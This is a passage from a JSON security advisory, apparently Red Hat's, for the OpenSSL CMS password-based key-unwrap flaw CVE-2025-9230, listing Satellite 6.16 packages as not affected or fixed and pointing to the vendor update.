"name": "scap-security-guide-satellite-0:1.0.6-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
},
"product_reference": "scap-security-guide-satellite-0:1.0.6-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-9230",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2025-09-17T12:15:34.387000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2396054"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the OpenSSL CMS implementation (RFC 3211 KEK Unwrap). This vulnerability allows memory corruption, an application level denial of service, or potential execution of attacker-supplied code via crafted CMS messages using password-based encryption (PWRI).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openssl: Out-of-bounds read \u0026 write in RFC 3211 KEK Unwrap",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability was rated as Moderate because, while the potential impact includes an application level denial of service and possible arbitrary code execution, successful exploitation is considered unlikely due to the high attack complexity and the fact that password-based CMS encryption (PWRI) is rarely used in real-world deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9230"
},
{
"category": "external",
"summary": "RHBZ#2396054",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2396054"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9230",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9230"
}
],
"release_date": "2025-09-30T23:59:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
